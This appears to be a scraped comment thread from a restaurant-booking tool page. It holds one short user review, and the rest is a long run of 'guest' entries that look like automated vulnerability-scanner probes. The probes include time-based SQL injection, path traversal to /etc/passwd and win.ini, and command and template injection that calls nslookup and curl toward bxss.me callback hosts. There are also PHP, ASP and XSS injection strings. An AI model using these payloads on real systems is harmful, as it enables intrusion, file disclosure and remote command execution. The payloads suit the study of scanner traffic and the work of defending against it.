re: guest


-1) OR 440=(SELECT 440 FROM PG_SLEEP(15))--

1753894640

re: guest


-1)) OR 609=(SELECT 609 FROM PG_SLEEP(15))--

1753894645

re: guest


389IIR7y' OR 357=(SELECT 357 FROM PG_SLEEP(15))--

1753894650

re: guest


XnL9K7GD') OR 316=(SELECT 316 FROM PG_SLEEP(15))--

1753894656

re: guest


M3ubbquj')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--

1753894662

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894667

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894673

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1753894680

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1753894686

re: guest


'"

1753894689

re: guest

@@nLkcS

1753894691

re: guest

(select 198766*667891)

1753894692

re: guest

(select 198766*667891 from DUAL)

1753894693

Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.

1680225083 Reply
Add photos

re: guest

DbQKdeAx

1696996740

re: guest

1*

1696996740

re: guest

1*

1696996741

re: guest

1*

1696996741

re: guest

1*

1696996741

re: guest

-1 OR 2+177-177-1=0+0+0+1

1696996742

re: guest

-1 OR 3+177-177-1=0+0+0+1

1696996742

re: guest

if(now()=sysdate(),sleep(15),0)

1696996749

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1696996756

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1696996766

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1696996774

re: guest

-1; waitfor delay '0:0:15' --

1696996781

re: guest

-1); waitfor delay '0:0:15' --

1696996795

re: guest

1 waitfor delay '0:0:15' --

1696996806

re: guest

X8pzX1pe'; waitfor delay '0:0:15' --

1696996818

re: guest

-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--

1696996830

re: guest

-5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--

1696996838

re: guest

-1)) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

1696996846

re: guest

bo5YKqYZ' OR 374=(SELECT 374 FROM PG_SLEEP(15))--

1696996857

re: guest

Jj7DFq7C') OR 747=(SELECT 747 FROM PG_SLEEP(15))--

1696996866

re: guest

ahB3lTmv')) OR 410=(SELECT 410 FROM PG_SLEEP(15))--

1696996875

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1696996885

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1696996893

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1696996902

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1696996910

re: guest

1'"

1696996910

re: guest

@@NSW3a

1696996911

re: guest

dxF8Jf1j

1697002526

re: guest

1*

1697002527

re: guest

1*

1697002527

re: guest

1*

1697002527

re: guest

1*

1697002528

re: guest

-1 OR 2+796-796-1=0+0+0+1

1697002528

re: guest

-1 OR 3+796-796-1=0+0+0+1

1697002528

re: guest

if(now()=sysdate(),sleep(15),0)

1697002532

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002537

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002541

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002545

re: guest

-1; waitfor delay '0:0:15' --

1697002551

re: guest

-1); waitfor delay '0:0:15' --

1697002556

re: guest

1 waitfor delay '0:0:15' --

1697002560

re: guest

UN2AguTh'; waitfor delay '0:0:15' --

1697002565

re: guest

-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--

1697002570

re: guest

-5) OR 549=(SELECT 549 FROM PG_SLEEP(15))--

1697002574

re: guest

-1)) OR 216=(SELECT 216 FROM PG_SLEEP(15))--

1697002578

re: guest

gHIGZ9rX' OR 926=(SELECT 926 FROM PG_SLEEP(15))--

1697002583

re: guest

pjYNWCOY') OR 708=(SELECT 708 FROM PG_SLEEP(15))--

1697002587

re: guest

Wq5QGHwc')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--

1697002591

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002596

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002601

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1697002605

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1697002610

re: guest

1'"

1697002610

re: guest

@@95F8l

1697002611

re: guest

1gkc4goQO

1727141217

re: guest

response.write(9382382*9986103)

1727141220

re: guest

'+response.write(9382382*9986103)+'

1727141221

re: guest

"+response.write(9382382*9986103)+"

1727141222

re: guest

%0abcc:074625.67-13784.67.3bdc6.19990.2@bxss.me

1727141222

re: guest

to@example.com>%0d%0abcc:074625.67-13785.67.3bdc6.19990.2@bxss.me

1727141222

re: guest

<esi:include src="http://bxss.me/rpb.png"/>

1727141224

re: guest

../../../../../../../../../../../../../../etc/passwd

1727141224

re: guest

${9999960+9999849}

1727141224

re: guest

../../../../../../../../../../../../../../windows/win.ini

1727141225

re: guest

file:///etc/passwd

1727141225

re: guest

../../../../../../../../../../../../../../../proc/version

1727141226

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141227

re: guest

../../../../../../../../../../etc/passwd%00.jpg

1727141228

re: guest

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141228

re: guest

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141229

re: guest

'.gethostbyname(lc('hitbc'.'atcrftdo8323c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(74).chr(110).chr(72).'

1727141229

re: guest

)

1727141229

re: guest

".gethostbyname(lc("hitls"."uqvcevvc03c1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(67).chr(104).chr(82)."

1727141230

re: guest

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141230

re: guest

!(()&&!|*|*|

1727141230

re: guest

/etc/passwd

1727141230

re: guest

echo omlcrd$()\ pvxnfp\nz^xyu||a #' &echo omlcrd$()\ pvxnfp\nz^xyu||a #|" &echo omlcrd$()\ pvxnfp\nz^xyu||a #

1727141231

re: guest

^(#$!@#$)(()))******

1727141231

re: guest

%2fetc%2fpasswd

1727141231

re: guest

&echo dyylsq$()\ tzmaeh\nz^xyu||a #' &echo dyylsq$()\ tzmaeh\nz^xyu||a #|" &echo dyylsq$()\ tzmaeh\nz^xyu||a #

1727141231

re: guest

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141232

re: guest

|echo dfsvca$()\ cbsyte\nz^xyu||a #' |echo dfsvca$()\ cbsyte\nz^xyu||a #|" |echo dfsvca$()\ cbsyte\nz^xyu||a #

1727141232

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141232

re: guest

(nslookup hitqlvsyodpne0fa67.bxss.me||perl -e "gethostbyname('hitqlvsyodpne0fa67.bxss.me')")

1727141233

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141233

re: guest

$(nslookup hitlgqzoizlfka82a8.bxss.me||perl -e "gethostbyname('hitlgqzoizlfka82a8.bxss.me')")

1727141233

re: guest

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141234

re: guest

&nslookup hitjmoiqzlngqdffeb.bxss.me&'\"`0&nslookup hitjmoiqzlngqdffeb.bxss.me&`'

1727141234

re: guest

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141235

re: guest

&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&'\"`0&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&`'

1727141235

1727141235

re: guest

"+"A".concat(70-3).concat(22*4).concat(102).concat(72).concat(120).concat(83)+(require"socket"
Socket.gethostbyname("hitbg"+"ouegvlqp0a3d2.bxss.me.")[3].to_s)+"

1727141235

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141235

re: guest

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141235

re: guest

|(nslookup hitvoueqpzvbg87102.bxss.me||perl -e "gethostbyname('hitvoueqpzvbg87102.bxss.me')")

1727141235

re: guest

bxss.me/t/xss.html?%00

1727141236

re: guest

'+'A'.concat(70-3).concat(22*4).concat(99).concat(66).concat(104).concat(90)+(require'socket'
Socket.gethostbyname('hitez'+'wpjellxue1b27.bxss.me.')[3].to_s)+'

1727141236

1727141236

re: guest

file:///etc/passwd

1727141236

re: guest

`(nslookup hitvdonfbvisp396c5.bxss.me||perl -e "gethostbyname('hitvdonfbvisp396c5.bxss.me')")`

1727141236

1727141237

re: guest

/\../\../\../\../\../\../\../etc/passwd

1727141237

re: guest

;(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")|(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")&(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")

1727141237

re: guest

/etc/shells

1727141237

re: guest

/WEB-INF/web.xml

1727141238

re: guest

c:/windows/win.ini

1727141238

re: guest

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141238

re: guest

C:\WINDOWS\system32\drivers\etc\hosts

1727141238

re: guest

bxss.me

1727141239

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141240

re: guest

../../../../../../../../../../windows/win.ini%00.jpg

1727141241

re: guest

';print(md5(31337));$a='

1727141244

re: guest

/../../../../../../../../../../boot.ini

1727141244

re: guest

";print(md5(31337));$a="

1727141245

re: guest

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141246

re: guest

'"

1727141246

re: guest

${@print(md5(31337))}

1727141246

re: guest

..\..\..\..\..\..\..\..\windows\win.ini

1727141247

re: guest

<!--

1727141247

re: guest

${@print(md5(31337))}\

1727141247

re: guest

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141247

re: guest

'.print(md5(31337)).'

1727141247

re: guest

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141247

re: guest

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141248

re: guest

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141248

re: guest

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141249

re: guest

WEB-INF/web.xml

1727141249

re: guest

WEB-INF\web.xml

1727141250

re: guest

1

1727141698

re: guest

1

1727141713

re: guest

-1 OR 2+716-716-1=0+0+0+1 --

1727141713

re: guest

-1 OR 3+716-716-1=0+0+0+1 --

1727141714

re: guest

-1 OR 2+249-249-1=0+0+0+1

1727141714

re: guest

-1 OR 3+249-249-1=0+0+0+1

1727141715

re: guest

-1' OR 2+884-884-1=0+0+0+1 --

1727141715

re: guest

-1' OR 3+884-884-1=0+0+0+1 --

1727141716

re: guest

-1' OR 2+556-556-1=0+0+0+1 or '4K5zCJv3'='

1727141716

re: guest

-1' OR 3+556-556-1=0+0+0+1 or '4K5zCJv3'='

1727141717

re: guest

-1" OR 2+975-975-1=0+0+0+1 --

1727141717

re: guest

-1" OR 3+975-975-1=0+0+0+1 --

1727141718

re: guest

if(now()=sysdate(),sleep(15),0)

1727141729

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141742

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141751

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141762

re: guest

-1; waitfor delay '0:0:15' --

1727141772

re: guest

-1); waitfor delay '0:0:15' --

1727141781

re: guest

1 waitfor delay '0:0:15' --

1727141789

re: guest

ww0tV5jQ'; waitfor delay '0:0:15' --

1727141798

re: guest

-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--

1727141806

re: guest

-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--

1727141815

re: guest

-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--

1727141830

re: guest

W9GN419h' OR 355=(SELECT 355 FROM PG_SLEEP(15))--

1727141840

re: guest

Hi4GjAeP') OR 882=(SELECT 882 FROM PG_SLEEP(15))--

1727141851

re: guest

3MPIpRvn')) OR 620=(SELECT 620 FROM PG_SLEEP(15))--

1727141864

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141878

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141891

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727141928

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727141977

re: guest

1'"

1727141979

re: guest

@@uJusW

1727141983

re: guest

1

1727383016

re: guest

1

1727383016

re: guest

1

1727383016

re: guest

1

1727383564

re: guest

1

1727383564

re: guest

1

1727383564

re: guest

1I66SF4BE0

1753894453

re: guest

response.write(9422559*9040641)

1753894461

re: guest

'+response.write(9422559*9040641)+'

1753894462

re: guest

"+response.write(9422559*9040641)+"

1753894464

re: guest


<esi:include src="http://bxss.me/rpb.png"/>

1753894466

re: guest

${10000337+9999163}

1753894466

re: guest

../../../../../../../../../../../../../../etc/passwd

1753894468

re: guest

../../../../../../../../../../../../../../windows/win.ini

1753894470

re: guest

file:///etc/passwd

1753894472

re: guest

../

1753894475

re: guest

redirtest.acx

1753894476

re: guest

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894477

re: guest

)

1753894479

re: guest

!(()&&!|*|*|

1753894481

re: guest

^(#$!@#$)(()))******

1753894482

re: guest

'.gethostbyname(lc('hityk'.'mpfnqvel38a9b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(81).chr(102).chr(76).'

1753894484

re: guest

".gethostbyname(lc("hitkb"."rhmryffp6bbbf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(120).chr(71)."

1753894485

re: guest

gethostbyname(lc('hithu'.'pfuplzgrf91f7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(83).chr(118).chr(86)

1753894487

1753894491

re: guest

'"

1753894492

re: guest

bxss.me/t/xss.html?%00

1753894493

re: guest

<!--

1753894493

re: guest

"+"A".concat(70-3).concat(22*4).concat(110).concat(76).concat(101).concat(75)+(require"socket"
Socket.gethostbyname("hitou"+"dpqrcxfa113ff.bxss.me.")[3].to_s)+"

1753894493

re: guest

replies

1753894494

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894494

re: guest

'+'A'.concat(70-3).concat(22*4).concat(111).concat(71).concat(107).concat(79)+(require'socket'
Socket.gethostbyname('hitne'+'rxsgdzuj0bc5b.bxss.me.')[3].to_s)+'

1753894495

re: guest

replies

1753894496

re: guest

';print(md5(31337));$a='

1753894496

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894496

re: guest

'A'.concat(70-3).concat(22*4).concat(111).concat(81).concat(110).concat(80)+(require'socket'
Socket.gethostbyname('hitan'+'jltgyibz2363d.bxss.me.')[3].to_s)

1753894497

re: guest

replies/.

1753894497

re: guest

";print(md5(31337));$a="

1753894498

re: guest

/etc/shells

1753894498

re: guest


'"()&%<zzz><ScRiPt >WFLn(9883)</ScRiPt>

1753894499

re: guest

${@print(md5(31337))}

1753894499

re: guest

../../../../../../../../../../../../../../etc/shells

1753894499

re: guest

echo mogtnz$()\ webkom\nz^xyu||a #' &echo mogtnz$()\ webkom\nz^xyu||a #|" &echo mogtnz$()\ webkom\nz^xyu||a #

1753894500

re: guest

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbyesjzkeqv78e6f.bxss.me")}}

1753894500

re: guest

${@print(md5(31337))}\

1753894500

re: guest

c:/windows/win.ini

1753894501

re: guest

&echo msnrty$()\ tgxrqi\nz^xyu||a #' &echo msnrty$()\ tgxrqi\nz^xyu||a #|" &echo msnrty$()\ tgxrqi\nz^xyu||a #

1753894501

re: guest

'"()&%<zzz><ScRiPt >WFLn(9597)</ScRiPt>

1753894501

re: guest

'.print(md5(31337)).'

1753894502

re: guest

bxss.me

1753894502

re: guest

|echo lmstfc$()\ kraykb\nz^xyu||a #' |echo lmstfc$()\ kraykb\nz^xyu||a #|" |echo lmstfc$()\ kraykb\nz^xyu||a #

1753894503

re: guest


9820558

1753894503

1753894504

re: guest

expr 9000417803 - 977786

1753894504

1753894505

re: guest

(nslookup -q=cname hitmbqbjxyinc3ae53.bxss.me||curl hitmbqbjxyinc3ae53.bxss.me))

1753894506

re: guest

'"()

1753894507

re: guest

$(nslookup -q=cname hitbekxgsgchu3cba7.bxss.me||curl hitbekxgsgchu3cba7.bxss.me)

1753894507

re: guest


'&&sleep(27*1000)*llqear&&'

1753894508

re: guest

&nslookup -q=cname hityoyvytbehq4126b.bxss.me&'\"`0&nslookup -q=cname hityoyvytbehq4126b.bxss.me&`'

1753894509

re: guest


"&&sleep(27*1000)*iqlhvg&&"

1753894510

re: guest

&(nslookup -q=cname hityabblvwrve48c2d.bxss.me||curl hityabblvwrve48c2d.bxss.me)&'\"`0&(nslookup -q=cname hityabblvwrve48c2d.bxss.me||curl hityabblvwrve48c2d.bxss.me)&`'

1753894510

re: guest


'||sleep(27*1000)*ncaczc||'

1753894511

re: guest

|(nslookup -q=cname hittfrusjzlza8fe7b.bxss.me||curl hittfrusjzlza8fe7b.bxss.me)

1753894511

re: guest


"||sleep(27*1000)*ayjnke||"

1753894513

re: guest

`(nslookup -q=cname hithrazrbxtkz79016.bxss.me||curl hithrazrbxtkz79016.bxss.me)`

1753894513

re: guest

;(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)|(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)&(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)

1753894514

re: guest

|(nslookup${IFS}-q${IFS}cname${IFS}hitdypjyohapq69542.bxss.me||curl${IFS}hitdypjyohapq69542.bxss.me)

1753894516

re: guest

&(nslookup${IFS}-q${IFS}cname${IFS}hitzsgliigxktafda3.bxss.me||curl${IFS}hitzsgliigxktafda3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzsgliigxktafda3.bxss.me||curl${IFS}hitzsgliigxktafda3.bxss.me)&`'

1753894517

re: guest


4OZqvUXn

1753894657

re: guest


*1

1753894664

re: guest


*1

1753894665

re: guest


*1

1753894666

re: guest


*1

1753894667

re: guest

-1 OR 5*5=25 --

1753894667

re: guest

-1 OR 5*5=26 --

1753894669

re: guest

-1 OR 5*5=25

1753894669

re: guest

